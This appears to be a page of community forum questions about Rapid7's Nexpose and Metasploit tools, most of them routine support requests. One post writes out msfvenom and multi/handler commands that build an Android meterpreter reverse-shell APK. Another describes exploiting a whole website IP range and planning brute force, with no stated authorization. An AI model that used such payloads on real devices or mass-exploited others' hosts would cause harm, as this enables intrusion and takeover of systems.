Hello! I am testing right now but i can not add my endpoint range. Collector is running, AD and DHCP are configured,.. but i can not go on with agents. I want to add the range but i get: An internal server error has occurred. thx alexander
Posted by Alexander Jesse about a year ago
It's very frustrating that we are not able to create remediation projects from the "Vulnerability Information" view. We only see the option "export to csv" Is this something that is planned fixed?
Posted by Torb about a year ago
If I were to move a licence from one server to another, how would I go about that? This is for a migration to newer hardware. Last time I did this I was advised by r7 to "deactivate" my licence and move it over, however I have not found a method for this. Thank you
Posted by Things about a year ago
Greetings! Does anyone have a Report template or example SQL Query which simply pulls the number of Critical Vulnerabilities across different selected Sites or Asset Groups. E.g. data would be: Asset Group 1: 3939 critical vulns Asset Group 2: 323 critical vulns Asset Group 3: 5904 critical vulns
Posted by Schuyler Dorsey about a year ago
I'm trying to access a rooted android with no protection that is connected to my network and I have access to install or delete anything on. I port forwarded from router page to my ifconfig ip and port 4444, I even enabled DMZ that allows any incoming and outgoing connection. router firewall is off windows firewall is off, added inbound and outbound rules too even went to add gufw rules vmware is in bridged connection kali is official iso installed on vmware. msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=publicIP LPORT=4444 R>name.apk msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST ifconfig ip set LPORT 4444 exploit >installed apk and opened in android Then I just get this: running as background 0 started reverse tcp handler at ifconfig ip:4444 then just goes back to: msf[handler] > without even waiting to open the apk, or anything, never got any meterpreter shell. Tried everything. By swapping public ip and LHOST with ifconfig. Tried updating kali with apt-etc.. rebooting. just I always get same result above. What' the issue? The android mobile is connected to same network. :
Posted by Naimre about a year ago
Hello, I am trying to perform a CIS scan of a Windows 7 embedded system in order to harden the system. This is a thin client and one of the requirements for the applications to run correctly requires Microsoft IIS. This requirement is causing me issues with performing the CIS scan against the OS configuration as Nexpose only performs CIS scans against IIS and Internet explorer. I want to configure Nexpose to specifically focus on Windows 7 but i've been unable to achieve this. I have created a scan policy only including the Windows 7 baselines but it still fails. Has anybody encountered this issue and aware of a workaround? Thanks, Craig
Posted by Craig about a year ago
Hi, I have Metasploit Pro on Windows 10. I started with a Web Scan of a website. I got 2 websites crawled but no website vulnerabilities. Then I did a Scan of the IP's from the website IP going up to (-.255.) I got 30 Hosts and 51 Services. Mostly 80 and 443. I did get a lot of info on the OS's used. Then I ran exploit on all the IP's. It came up with a lot of errors (red) and no Sessions. I tried a Module of Java Exploit but it says "port 8080 is already in use." I read online to stop and start Metasploit to clear port 8080, but it didn't work. Does anyone know of any PDF's or instructions on how to use Metasploit Pro? All I see is Metasploit Framework. Some of the Exploits seemed to work (there were no "red" errors), but no Sessions. Some say "Manual cleanup is required", so that sounds good. What am I looking for while Exploiting? I am going to try Bruteforce next. I'll report back. Please reply with instructions on how to use Pro. Or the basics of what I'm supposed to be doing. (Attacking a website with a login on it.) Thanks!
Posted by Mike Held about a year ago
I am able to enter running meterpreter session without any problems, but when I try to execute any commands like ps, an error message appears saying "No such command". Maybe, does it have something to do with the exploit that I used? Thanks
Posted by Marek Miklenda about a year ago
My understanding is that bot need to be installed. One place suggests using two computers for this. I can do that but wonder if it's really necessary or even somehow "better" to work with. My objective is to do a fairly infrequent external pen test. If they are installed on the same machine then what things might one need to watch out for and/or do to tailor things?
Posted by Fred Marshall about a year ago
Hello Experts, I have multiple sites defined in nexpose with assets and asset groups in them. Now I am trying to write an sql query in order to fetch fields like Vulnerability name , cvss score of all the vulnerabilities found in all the sites in the last most scan, we have scheduled scans for our sites. Your help is highly appreciated. Thanks
Posted by Frank about a year ago
I can access localhost anymore after windows update. Running Windows 10 Pro 16 Gig Ram 64bit Can you reinstall the software? Will that clear the database/project?
Posted by Stan Spears about a year ago
I was creating a spreadsheet to use the algorithm identified on the below page so I can better estimate the scan time for my sites and readjust their schedules. I noticed, however, that something is wrong in the KB article. The algorithm states: 105 (number live assets) X 65535 (number of ports to be scanned) X 1 (maximum retries) / 200 (minimum packets per second) / 60 seconds = 1146.86 minutes to scan However, the math actually returns 573.43, which would've been the result if you multiple by 200 packets per second, divided by 2. So is the stated algorithm correct with an incorrect answer, or is the answer correct with an incorrect algorithm? https://kb.help.rapid7.com/docs/measuring-scan-performance-and-time
Posted by David Howell about a year ago